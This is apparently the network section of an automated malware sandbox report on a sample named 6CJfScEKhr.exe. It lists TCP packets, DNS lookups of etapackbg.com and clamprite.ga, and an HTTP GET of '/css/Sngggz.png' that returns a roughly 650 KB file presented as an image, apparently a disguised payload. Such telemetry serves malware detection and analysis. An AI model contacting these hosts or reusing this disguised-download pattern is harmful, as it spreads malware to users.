                                                                    Feb 26, 2022 10:20:29.670120955 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.670126915 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670156002 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670161009 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.670191050 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670203924 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.670231104 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670269012 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.670270920 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670305967 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670332909 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670358896 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670370102 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.670383930 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.670386076 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670408964 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670428991 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670454979 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670459986 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.670481920 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670481920 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.670509100 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670536041 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670550108 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.670566082 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670593023 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670608044 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.670619965 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670650959 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670665026 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.670679092 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670700073 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670707941 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.670721054 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670751095 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670763969 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.670777082 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670804977 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670814037 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.670830965 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670857906 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670882940 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670883894 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.670911074 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670912027 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.670938015 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.670978069 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671000957 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.671004057 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671034098 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671056986 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.671060085 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671087027 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671089888 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.671113968 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671139956 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671164989 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.671175957 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671200037 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.671214104 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671251059 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671263933 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.671288967 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671324968 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671341896 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.671364069 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.671366930 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671406031 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671437979 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.671451092 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671469927 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671499014 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671525955 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671535969 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.671555042 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671562910 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.671581984 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671608925 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671631098 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.671636105 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671664000 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671678066 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.671686888 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671708107 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671719074 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.671729088 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671756983 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671765089 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.671783924 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671809912 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671823978 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.671838045 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671865940 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671879053 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.671892881 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671892881 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.671920061 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671936035 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.671955109 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.671968937 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.671983957 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.672010899 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.672023058 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.672028065 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.679907084 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.679960966 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.680023909 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.680685043 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.680721045 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.680757046 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.680782080 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.682502985 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.682545900 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.682619095 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.684262037 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.684284925 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.684345007 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.684366941 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.686083078 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.686105013 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.686157942 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.687856913 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.687879086 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.687937975 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.689672947 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.689697027 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.689785004 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.691483974 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.691509962 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.691595078 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.692900896 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.692924976 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.692980051 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.693182945 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.693207979 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.693228960 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.693249941 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.693268061 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.693273067 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.693283081 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.693298101 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.693304062 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.693331003 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.693348885 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.694173098 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.694224119 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.694324017 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.694443941 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.694498062 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.694607973 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.695663929 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.695688009 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.695734024 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.695761919 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.696288109 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.696346045 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.696398973 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.701262951 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.701309919 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.701350927 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.701375008 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.701391935 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.701431990 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.706219912 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.706279039 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.706324100 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.706351995 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.706367016 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.706391096 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.706461906 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.706506968 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.706569910 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.707180023 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.707226992 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.707287073 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.708594084 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.708620071 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.708694935 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.708836079 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.708858013 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.708928108 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.708929062 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.708996058 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.709072113 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.709129095 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.709204912 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.709261894 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.709772110 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.709799051 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.709847927 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.710086107 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.710109949 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.710129976 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.710150003 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.710205078 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.710228920 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.711302042 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.711339951 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.711366892 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.711390972 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.711390972 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.711456060 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.711508989 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.711532116 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.711646080 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.711958885 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.712009907 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.712032080 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.712050915 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.712059021 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.712129116 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.717187881 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.717236996 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.717267990 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.717278957 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.717298031 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.717328072 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.717356920 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.717380047 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.717387915 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.717389107 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.717430115 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.717439890 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.717509031 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.717509985 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.717519045 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.717541933 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.717572927 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.717596054 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.717623949 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.717628956 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.717664957 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.717680931 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.717699051 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.717737913 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.717740059 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.717775106 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.717832088 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.718471050 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.718497992 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.718519926 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.718533993 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.718540907 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.718563080 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.718583107 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.718592882 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.718604088 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.718617916 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.718626022 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.718647003 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.718663931 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.718766928 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.719394922 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.719434977 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.719465971 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.719486952 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.719496012 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.719528913 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.719549894 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.719558001 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.719588995 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.719609022 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.719618082 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.719647884 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.719671965 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.720316887 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.720344067 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.720365047 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.720385075 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.720402002 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.720403910 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.720416069 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.720424891 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.720446110 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.720465899 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.720468044 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.720490932 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.720516920 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.720558882 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.721247911 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.721277952 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.721298933 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.721354008 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.721564054 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.721590996 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.721612930 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.721635103 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.721647024 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.721657038 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.721661091 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.721678972 CET8049794104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:20:29.721704960 CET4979480192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:20:29.864454985 CET4979480192.168.2.5104.21.89.250

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Feb 26, 2022 10:18:55.423279047 CET5244153192.168.2.58.8.8.8
                                                                    Feb 26, 2022 10:18:55.445765972 CET53524418.8.8.8192.168.2.5
                                                                    Feb 26, 2022 10:19:50.136555910 CET5516153192.168.2.58.8.8.8
                                                                    Feb 26, 2022 10:19:50.154978037 CET53551618.8.8.8192.168.2.5
                                                                    Feb 26, 2022 10:20:19.953195095 CET6007553192.168.2.58.8.8.8
                                                                    Feb 26, 2022 10:20:19.969784975 CET53600758.8.8.8192.168.2.5
                                                                    Feb 26, 2022 10:20:29.451486111 CET6434553192.168.2.58.8.8.8
                                                                    Feb 26, 2022 10:20:29.469819069 CET53643458.8.8.8192.168.2.5

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                    Feb 26, 2022 10:18:55.423279047 CET192.168.2.58.8.8.80x42a0Standard query (0)etapackbg.comA (IP address)IN (0x0001)
                                                                    Feb 26, 2022 10:19:50.136555910 CET192.168.2.58.8.8.80xe4feStandard query (0)clamprite.gaA (IP address)IN (0x0001)
                                                                    Feb 26, 2022 10:20:19.953195095 CET192.168.2.58.8.8.80xcc80Standard query (0)etapackbg.comA (IP address)IN (0x0001)
                                                                    Feb 26, 2022 10:20:29.451486111 CET192.168.2.58.8.8.80x3fc7Standard query (0)etapackbg.comA (IP address)IN (0x0001)

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                    Feb 26, 2022 10:18:55.445765972 CET8.8.8.8192.168.2.50x42a0No error (0)etapackbg.com104.21.89.250A (IP address)IN (0x0001)
                                                                    Feb 26, 2022 10:18:55.445765972 CET8.8.8.8192.168.2.50x42a0No error (0)etapackbg.com172.67.166.49A (IP address)IN (0x0001)
                                                                    Feb 26, 2022 10:19:50.154978037 CET8.8.8.8192.168.2.50xe4feNo error (0)clamprite.ga80.66.64.174A (IP address)IN (0x0001)
                                                                    Feb 26, 2022 10:20:19.969784975 CET8.8.8.8192.168.2.50xcc80No error (0)etapackbg.com104.21.89.250A (IP address)IN (0x0001)
                                                                    Feb 26, 2022 10:20:19.969784975 CET8.8.8.8192.168.2.50xcc80No error (0)etapackbg.com172.67.166.49A (IP address)IN (0x0001)
                                                                    Feb 26, 2022 10:20:29.469819069 CET8.8.8.8192.168.2.50x3fc7No error (0)etapackbg.com104.21.89.250A (IP address)IN (0x0001)
                                                                    Feb 26, 2022 10:20:29.469819069 CET8.8.8.8192.168.2.50x3fc7No error (0)etapackbg.com172.67.166.49A (IP address)IN (0x0001)

                                                                    HTTP Request Dependency Graph

                                                                    • etapackbg.com
                                                                    • clamprite.ga

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.549741104.21.89.25080C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 26, 2022 10:18:55.495990992 CET550OUTGET /css/Sngggz.png HTTP/1.1
                                                                    Host: etapackbg.com
                                                                    Connection: Keep-Alive
                                                                    Feb 26, 2022 10:18:55.529630899 CET552INHTTP/1.1 200 OK
                                                                    Date: Sat, 26 Feb 2022 09:18:55 GMT
                                                                    Content-Type: image/png
                                                                    Content-Length: 657920
                                                                    Connection: keep-alive
                                                                    cache-control: public, max-age=604800
                                                                    expires: Sat, 05 Mar 2022 08:29:09 GMT
                                                                    last-modified: Fri, 25 Feb 2022 00:36:02 GMT
                                                                    x-turbo-charged-by: LiteSpeed
